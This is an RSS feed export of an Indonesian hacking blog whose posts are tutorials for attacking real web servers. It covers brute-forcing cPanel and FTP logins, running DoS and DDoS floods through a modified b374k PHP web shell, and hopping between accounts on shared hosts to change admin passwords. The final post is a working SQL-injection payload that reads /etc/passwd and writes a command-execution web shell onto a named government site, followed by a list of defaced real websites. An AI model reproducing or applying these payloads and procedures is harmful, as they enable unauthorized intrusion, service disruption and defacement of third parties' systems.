<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hack Arsip | james0baster.web.id</title>
	<atom:link href="https://www.james0baster.web.id/category/computer/hack/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.james0baster.web.id/category/computer/hack/</link>
	<description>James Buster Tamba Blog</description>
	<lastBuildDate>Tue, 30 Aug 2016 12:54:24 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.7.1</generator>
	<item>
		<title>Bruteforce dengan shell</title>
		<link>https://www.james0baster.web.id/2011/02/07/bruteforce-dengan-shell/</link>
					<comments>https://www.james0baster.web.id/2011/02/07/bruteforce-dengan-shell/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Mon, 07 Feb 2011 07:45:23 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=260</guid>

					<description><![CDATA[<p>sebetulnya teknik ini sama dengan postingan itu sama2 jumping buat ngebrote user dan password cpanel, ftp, ataupun whm oke langsung aja yah : 1. download shell yg ada di sini 2. masukan passwordnya biar bisa akses shellnya 3. klik menu BruteForce 4. isikan list password yg anda suka yg sering ane gunain Password List : [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/07/bruteforce-dengan-shell/">Bruteforce dengan shell</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="http://www.james0baster.web.id/wp-content/uploads/2011/02/shoot.gif"><img decoding="async" class="size-full wp-image-264 alignleft" title="shoot" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/shoot.gif" alt="shoot" width="108" height="68" /></a></p>
<p>sebetulnya teknik ini sama dengan <a href="http://www.james0baster.web.id/2011/02/07/tutorial-buat-para-jumper/" target="_blank"><span style="color: #ff0000;">postingan itu</span></a></p>
<p>sama2 jumping <img decoding="async" title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /></p>
<p>buat ngebrote user dan password cpanel, ftp, ataupun whm</p>
<p>oke langsung aja yah <img decoding="async" title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /> :<span id="more-260"></span></p>
<p>1. <span style="color: #ff0000;"><a href="http://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a> </span><br />
2. masukan passwordnya biar bisa akses shellnya<br />
<img fetchpriority="high" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg" alt="tempat-password" width="1278" height="217" class="alignnone size-full wp-image-867" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg 1278w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-300x51.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-768x130.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-1024x174.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-600x102.jpg 600w" sizes="(max-width: 1278px) 100vw, 1278px" /></p>
<p>3. klik menu BruteForce<br />
4. isikan list password yg anda suka<br />
yg sering ane gunain</p>
<blockquote><p><cite><span style="color: #ff0000;">Password List :</span></cite></p></blockquote>
<blockquote><p><cite></cite>12345<br />
123456<br />
1234567<br />
12345678<br />
123456789<br />
1234567890</p></blockquote>
<p>nanti hasilnya kaya gini :</p>
<blockquote><p><cite><span style="color: #ff0000;">Hasilnya:</span></cite></p></blockquote>
<blockquote><p><cite></cite>[ james0baster@james0baster.web.id ]# Seraaaanngg &#8230;<br />
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = wonder dan passwordnya = 12345<br />
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = pond dan passwordnya = 12345</p></blockquote>
<p>coba login aja ke cpanelnya <img decoding="async" title="asik" src="http://devilzc0de.org/forum/images/smilies/asik.gif" border="0" alt="asik" /><br />
174.120.9.58/cpanel<br />
<img decoding="async" title="santai" src="http://devilzc0de.org/forum/images/smilies/santai.gif" border="0" alt="santai" /></p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/07/bruteforce-dengan-shell/">Bruteforce dengan shell</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2011/02/07/bruteforce-dengan-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Tutorial Dos Attack untuk menjurus ke DDOS</title>
		<link>https://www.james0baster.web.id/2011/02/07/tutorial-dos-attack-untuk-menjurus-ke-ddos/</link>
					<comments>https://www.james0baster.web.id/2011/02/07/tutorial-dos-attack-untuk-menjurus-ke-ddos/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Mon, 07 Feb 2011 07:39:58 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=257</guid>

					<description><![CDATA[<p>kali ini ane mau buat tutor dos yah tau kan dos kalo belom tau bisa berkunjung ke http://id.wikipedia.org/wiki/Serangan_DoS oke langsung aja yah 😀 : 1. download shell yg ada di sini 2. masukan passwordnya biar bisa akses shellnya 3. klik menu DOS akan menampilkan form seperti berikut : 4. isi fild &#8220;host&#8221; fild &#8220;host&#8221; bisa [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/07/tutorial-dos-attack-untuk-menjurus-ke-ddos/">Tutorial Dos Attack untuk menjurus ke DDOS</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>kali ini ane mau buat tutor dos<br />
yah tau kan dos kalo belom tau bisa berkunjung ke<br />
<a rel="nofollow" href="http://id.wikipedia.org/wiki/Serangan_DoS" target="_blank"><span style="color: #ff0000;">http://id.wikipedia.org/wiki/Serangan_DoS</span></a></p>
<p>oke langsung aja yah 😀 <img decoding="async" title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /> :<span id="more-800"></span></p>
<p>1.<span style="color: #ff0000;"> <a href="http://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a></span><span style="color: #ff0000;"> </span><br />
2. masukan passwordnya biar bisa akses shellnya</p>
<p><img decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg" alt="tempat-password" width="1278" height="217" class="alignnone size-full wp-image-867" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg 1278w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-300x51.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-768x130.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-1024x174.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-600x102.jpg 600w" sizes="(max-width: 1278px) 100vw, 1278px" /></p>
<p>3. klik menu DOS<br />
akan menampilkan form seperti berikut :<br />
<img loading="lazy" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/ddos.jpg" alt="ddos" width="1038" height="138" class="alignnone size-full wp-image-870" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos.jpg 1038w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-300x40.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-768x102.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-1024x136.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-600x80.jpg 600w" sizes="auto, (max-width: 1038px) 100vw, 1038px" /></p>
<p>4. isi fild &#8220;host&#8221;<br />
fild &#8220;host&#8221; bisa di isi dengan <span style="color: #ff0000;">domain </span>ataupun <span style="color: #ff0000;">ip target</span></p>
<p>5. isi fild &#8220;Length (seconds)&#8221;<br />
fild &#8220;Length (seconds)&#8221; di isi dengan <span style="color: #ff0000;">99999999999 </span>atau sebanyak2nya <img decoding="async" title="ngakak" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" border="0" alt="ngakak" /></p>
<p>6. coba ping ke domain atau ip target<br />
kalo belum rto berarti ga bisa di DOS <img decoding="async" title="seneng" src="http://devilzc0de.org/forum/images/smilies/penjahat.gif" border="0" alt="seneng" /><br />
coba serang dengan shell yg berada di server lain<br />
jadi serangannya <span style="color: #ff0000;">terdistribusi </span>atau sering disebut <span style="color: #ff0000;">DDOS </span><img decoding="async" title="maling" src="http://devilzc0de.org/forum/images/smilies/maling.gif" border="0" alt="maling" /><br />
yah bisa sampe 10 shell lah buat liat perubahan yang pasti <img decoding="async" title="cihuy" src="http://devilzc0de.org/forum/images/smilies/scary%20movie%20character.gif" border="0" alt="cihuy" /></p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/07/tutorial-dos-attack-untuk-menjurus-ke-ddos/">Tutorial Dos Attack untuk menjurus ke DDOS</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2011/02/07/tutorial-dos-attack-untuk-menjurus-ke-ddos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Tutorial buat para jumper</title>
		<link>https://www.james0baster.web.id/2011/02/07/tutorial-buat-para-jumper/</link>
					<comments>https://www.james0baster.web.id/2011/02/07/tutorial-buat-para-jumper/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Mon, 07 Feb 2011 07:33:01 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=251</guid>

					<description><![CDATA[<p>inget pilem jumper yg suka lompat kalo ini teknik sama suka lompat ke user lain satu server oke mulai aja yah tutornya 😀 1. download shell yg ada di sini 2. masukan passwordnya biar bisa akses shellnya 3. klik menu readable akan menghasilkan hasil scanan user yg readable 4. copy salah satu list contoh : [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/07/tutorial-buat-para-jumper/">Tutorial buat para jumper</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>inget pilem jumper yg suka lompat <img decoding="async" title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /></p>
<p>kalo ini teknik sama suka lompat <img decoding="async" title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /> ke user lain satu server</p>
<p>oke mulai aja yah tutornya 😀<span id="more-251"></span></p>
<p>1. <a href="http://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a><br />
2. masukan passwordnya biar bisa akses shellnya<br />
<img loading="lazy" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg" alt="tempat-password" width="1278" height="217" class="alignnone size-full wp-image-867" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg 1278w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-300x51.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-768x130.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-1024x174.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-600x102.jpg 600w" sizes="auto, (max-width: 1278px) 100vw, 1278px" /></p>
<p>3. klik menu readable<br />
akan menghasilkan hasil scanan user yg readable<br />
<img loading="lazy" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html.jpg" alt="read-public-html" width="1159" height="660" class="alignnone size-full wp-image-869" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html.jpg 1159w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-300x171.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-768x437.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-1024x583.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-600x342.jpg 600w" sizes="auto, (max-width: 1159px) 100vw, 1159px" /><br />
4. copy salah satu list<br />
contoh :<span style="color: #ff0000;"> /home/gracepcc/public_html</span></p>
<p>5. klik menu explore</p>
<p>6. pastekan readable user yg sudah kita copy ke <span style="color: #ff0000;">View File/Folder</span></p>
<p>5. cari file konfigurasi koneksi ke database</p>
<p>6. login ke mysqlnya dengan mengklik menu</p>
<p>7. cari table user<br />
ubah password user tersebut</p>
<p>8. cari tau domain user tersebut<br />
ada beberapa cara :<br />
liat file konfigurasi ke database<br />
liat di dalam databse<br />
atau bisa membuka <span style="color: #ff0000;">domainygadashell.com/~user/</span><br />
contoh: <span style="color: #ff0000;">domainygadashell.com/~gracepcc/</span></p>
<p>9. login sebagai admin.<br />
kalo mau tau tempat loginnya bisa liat di shell, kan bisa liat ftpnya dia <img decoding="async" title="hmm" src="http://devilzc0de.org/forum/images/smilies/gg.gif" border="0" alt="hmm" /> tapi ga bisa upload <img decoding="async" title="mewek" src="http://devilzc0de.org/forum/images/smilies/mewek.gif" border="0" alt="mewek" /></p>
<p>cara mengatasi upload maka uploadnya via halaman admin web tersebut <img decoding="async" title="asik" src="http://devilzc0de.org/forum/images/smilies/asik.gif" border="0" alt="asik" /> <img decoding="async" title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /></p>
<p>jadih deh shell anda beranak pinak <img decoding="async" title="ngakak" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" border="0" alt="ngakak" /></p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/07/tutorial-buat-para-jumper/">Tutorial buat para jumper</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2011/02/07/tutorial-buat-para-jumper/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ngedit Script b374k</title>
		<link>https://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/</link>
					<comments>https://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Tue, 01 Feb 2011 09:10:15 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=225</guid>

					<description><![CDATA[<p>nih scriptnya copas ke notepad terus save dengan file tipe php 😀 (*yg udah tau pasti ) http://xjamesx.tk/404.txt ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS, dan pengunaan password untuk mengakses shell tersebut 😀 passwordnya = devilzc0de atau bisa ubah sendiri [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/">Ngedit Script b374k</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>nih scriptnya copas ke notepad terus save dengan file tipe php 😀 (*yg udah tau pasti <img decoding="async" title="hmm" src="http://devilzc0de.org/forum/images/smilies/gg.gif" border="0" alt="hmm" />)<br />
<a href="http://xjamesx.tk/404.txt" target="_blank"><span style="color: #ff0000;">http://xjamesx.tk/404.txt</span></a></p>
<p>ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS,<br />
dan pengunaan password untuk mengakses shell tersebut 😀<span id="more-225"></span><br />
<!--more--><br />
<img loading="lazy" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg" alt="tempat-password" width="1278" height="217" class="alignnone size-full wp-image-867" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password.jpg 1278w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-300x51.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-768x130.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-1024x174.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/tempat-password-600x102.jpg 600w" sizes="auto, (max-width: 1278px) 100vw, 1278px" /></p>
<p>passwordnya = devilzc0de</p>
<p><img loading="lazy" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html.jpg" alt="read-public-html" width="1159" height="660" class="alignnone size-full wp-image-869" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html.jpg 1159w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-300x171.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-768x437.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-1024x583.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/read-public-html-600x342.jpg 600w" sizes="auto, (max-width: 1159px) 100vw, 1159px" /></p>
<p>atau bisa ubah sendiri password hashnya dalam bentuk md5 <img decoding="async" title="mantap" src="http://devilzc0de.org/forum/images/smilies/top.gif" border="0" alt="mantap" /></p>
<h1><span style="color: #ff0000;"> UPGRADE SCRIPT</span></h1>
<p><a href="http://xjamesx.tk/404.txt" target="_blank"><span style="color: #ff0000;">http://xjamesx.tk/404.txt</span></a></p>
<p>ditambahkan DOS attack</p>
<p><img loading="lazy" decoding="async" src="http://www.james0baster.web.id/wp-content/uploads/2011/02/ddos.jpg" alt="ddos" width="1038" height="138" class="alignnone size-full wp-image-870" srcset="https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos.jpg 1038w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-300x40.jpg 300w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-768x102.jpg 768w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-1024x136.jpg 1024w, https://www.james0baster.web.id/wp-content/uploads/2011/02/ddos-600x80.jpg 600w" sizes="auto, (max-width: 1038px) 100vw, 1038px" /></p>
<h2><span style="color: #ff0000;">NB Script di encode biar ukurannya jadi lebih kecil aja</span></h2>
<p>kalo mau decode bisa make script php ini :</p>
<blockquote><p>gzinflate(base64_decode($scripygdiencode))</p></blockquote>
<p>Posting <a href="https://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/">Ngedit Script b374k</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2011/02/01/ngedit-script-b374k/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>POC buat ngedeface++</title>
		<link>https://www.james0baster.web.id/2010/08/07/poc-buat-ngedeface/</link>
					<comments>https://www.james0baster.web.id/2010/08/07/poc-buat-ngedeface/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Sat, 07 Aug 2010 05:38:04 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=164</guid>

					<description><![CDATA[<p>Wah dah lama ga ngeblog kali ini gw mau share beberapa teknik2(POC) buat ngedeface . kalo yang sudah pada tau teknik2 ini jangan pada ngina yah maklum nubie mau coba bikin artikel :p yang sudah baca yah jangan lupa komen2nya yah itung2 belajar bareng 🙂 ok mulai aja deh ke tutor hal yg diperlukan : [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/08/07/poc-buat-ngedeface/">POC buat ngedeface++</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Wah dah lama ga ngeblog</p>
<p>kali ini gw mau share beberapa teknik2(POC) buat ngedeface .</p>
<p>kalo yang sudah pada tau teknik2 ini jangan pada ngina</p>
<p>yah maklum nubie mau coba bikin artikel :p</p>
<p>yang sudah baca yah jangan lupa komen2nya</p>
<p>yah itung2 belajar bareng 🙂</p>
<p>ok mulai aja deh ke tutor</p>
<p><span id="more-164"></span></p>
<p>hal yg diperlukan :</p>
<ol>
<li>berdoa</li>
<li>siapin makanan ringan</li>
<li>dan segelas kopi (java)</li>
<li>koneksi internet + komputernya 🙂</li>
</ol>
<p>nah kalo udah pada siap liangsung pergi ke om <a href="http://google.co.id">google </a> untuk melakukan pencarian dengan dork :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/googeling.jpg"><img decoding="async" class="size-full wp-image-155 aligncenter" title="googeling" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/googeling.jpg" alt="" width="614" /></a></p>
<p>kemudian pilih deh web target yang memiliki vulnerability 🙂</p>
<p>target : <a rel="nofollow" href="http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7'+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file('/etc/passwd'),8,9,10/*">http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7&#8217;+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(&#8216;/etc/passwd&#8217;),8,9,10/*</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/wp-content/uploads/2010/08/target.jpg"><img decoding="async" class="size-full wp-image-158 aligncenter" title="target" src="http://www.james0baster.web.id/wp-content/uploads/2010/08/target.jpg" alt="ngedeface" width="614" /></a></p>
<p>setelah masuk ke website targget ubah url nya yg tadinya <span style="color: #ff0000;">load_file(&#8216;/etc/passwd&#8217;) <span style="color: #000000;">menjadi</span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"> <span style="color: #ff0000;">&#8220;&lt;?php echo \'&lt;pre&gt;\&#8217;;system($_GET[\&#8217;cmd\&#8217;]);echo \'&lt;/pre&gt;\&#8217;;?&gt;&#8221;</span> </span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;">dan diakhir url ditambahkan </span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"><span style="color: #ff0000;"> +INTO+OUTFILE+&#8221;lokasi direktory(folder) yang permisionya 777/namashell.php&#8221;/*</span></span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;">real target : <a href="http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7'+union+select+1,2,3,4,5,6,&quot;&lt;?php echo \'&lt;pre&gt;\';system($_GET[\'cmd\']);echo \'&lt;/pre&gt;\';?&gt;&quot;,8,9,10+INTO+OUTFILE+&quot;/home/inacif/www/design/default/james0bastershell.php&quot;/*">http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7&#8217;+union+select+1,2,3,4,5,6,&#8221;&lt;?php echo \'&lt;pre&gt;\&#8217;;system($_GET[\&#8217;cmd\&#8217;]);echo \'&lt;/pre&gt;\&#8217;;?&gt;&#8221;,8,9,10+INTO+OUTFILE+&#8221;/home/inacif/www/design/default/james0bastershell.php&#8221;/*</a></span></span></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/spown.jpg"><img decoding="async" class="size-large wp-image-157 aligncenter" title="spown" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/spown-1024x306.jpg" alt="" width="614" /></a></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"><br />
</span></span></p>
<p>setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil</p>
<p>atau tidak dengan menjalankan perintah ls -al pada cmd=</p>
<p>real target : <a rel="nofollow" href="http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls%20-al">http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/wp-content/uploads/2010/08/shell-sederhana.jpg"><img decoding="async" class="size-full wp-image-156 aligncenter" title="shell sederhana" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-sederhana.jpg" alt="shell sederhana" width="614" /></a></p>
<p>upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php 😀 dengan perintah</p>
<p>download sebagai berikut :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/wp-content/uploads/2010/08/upload.jpg"><img decoding="async" class="size-large wp-image-159 aligncenter" title="upload" src="http://www.james0baster.web.id/wp-content/uploads/2010/08/upload-1024x434.jpg" alt="upload" width="614" /></a></p>
<p>dan hasilnya sebagai berikut :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/wp-content/uploads/2010/08/shell.jpg"><img decoding="async" class="size-large wp-image-165 aligncenter" title="shell" src="http://www.james0baster.web.id/wp-content/uploads/2010/08/shell-1024x442.jpg" alt="shell" width="614" /></a></p>
<p>bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.</p>
<p>kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scaner.jpg"><img loading="lazy" decoding="async" class="size-full wp-image-166 aligncenter" title="scaner" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scaner.jpg" alt="" width="444" height="495" /></a></p>
<p>berikut hasil URL jumpingan dari <a href="http://www.inacif.gob.gt/" target="_self">http://www.inacif.gob.gt/</a> ke  <a href="http://www.cinde.com.gt/" target="_self">http://www.cinde.com.gt/</a></p>
<p>URL : <a rel="nofollow" href="http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/">http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/</a></p>
<p>dan berikut hasil defaceannya 😀</p>
<ul>
<li><a rel="nofollow" href="http://www.cinde.com.gt/webcontrol/james0baster.html">http://www.cinde.com.gt/webcontrol/james0baster.html</a></li>
<li><a rel="nofollow" href="http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html">http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html</a></li>
<li><a rel="nofollow"  href="http://www.asociacioncambiandovidas.org/media/Image/james0baster.html">http://www.asociacioncambiandovidas.org/media/Image/james0baster.html</a></li>
<li><a rel="nofollow" href="http://sanjuansacatepequez.com.gt/media/Image/james0baster.html">http://sanjuansacatepequez.com.gt/media/Image/james0baster.html</a></li>
<li><a rel="nofollow" href="http://merka.com.gt/media/Image/james0baster.html">http://merka.com.gt/media/Image/james0baster.html</a></li>
<li><a rel="nofollow" href="http://difoto.com/media/Image/james0baster.html">http://difoto.com/media/Image/james0baster.html</a></li>
<li><a rel="nofollow" href="http://web.ecssa.com.gt/media/Image/james0baster.html">http://web.ecssa.com.gt/media/Image/james0baster.html</a></li>
<li>http://dmarie.com.gt/media/Image/james0baster.html</li>
<li>http://www.horcalsa.com/media/Image/james0baster.html</li>
<li>http://aplytek.com/media/Image/james0baster.html</li>
<li>http://www.ffacsa.com/media/Image/james0baster.html</li>
<li>http://www.palixcan.com/media/Image/james0baster.html</li>
<li>http://www.rototec.com.gt/media/Image/james0baster.html</li>
<li>http://www.pinbol.net/media/Image/james0baster.html</li>
<li>http://www.nisfessa.com/media/Image/james0baster.html</li>
<li>http://www.fmglobo.com.gt/media/Image/james0baster.html</li>
<li>http://www.artgala.org/media/Image/james0baster.html</li>
<li>http://www.cognos.com.gt/media/Image/james0baster.html</li>
<li>http://www.saluvita.com.gt/media/Image/james0baster.html</li>
<li>http://www.copredeh.gob.gt/media/Image/james0baster.html</li>
<li>http://adinmsa.com/media/Image/james0baster.html</li>
<li>http://elmastil.com/media/Image/james0baster.html</li>
<li>http://starkids.com.gt/media/Image/james0baster.html</li>
<li>http://www.inacif.gob.gt/design/default/james0baster.html</li>
</ul>
<p>dan masih banyak lagi :p</p>
<p>sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih</p>
<p><a rel="nofollow" href="http://www.inacif.gob.gt/design/default/james0basterscaner.php">http://www.inacif.gob.gt/design/default/james0basterscaner.php</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/wp-content/uploads/2010/08/scanerajib.jpg"><img loading="lazy" decoding="async" class="size-full wp-image-188 aligncenter" title="scanerajib" src="http://www.james0baster.web.id/wp-content/uploads/2010/08/scanerajib.jpg" alt="scanerajib" width="515" height="326" /></a></p>
<p>NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDDEN AJA.</p>
<p>ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH</p>
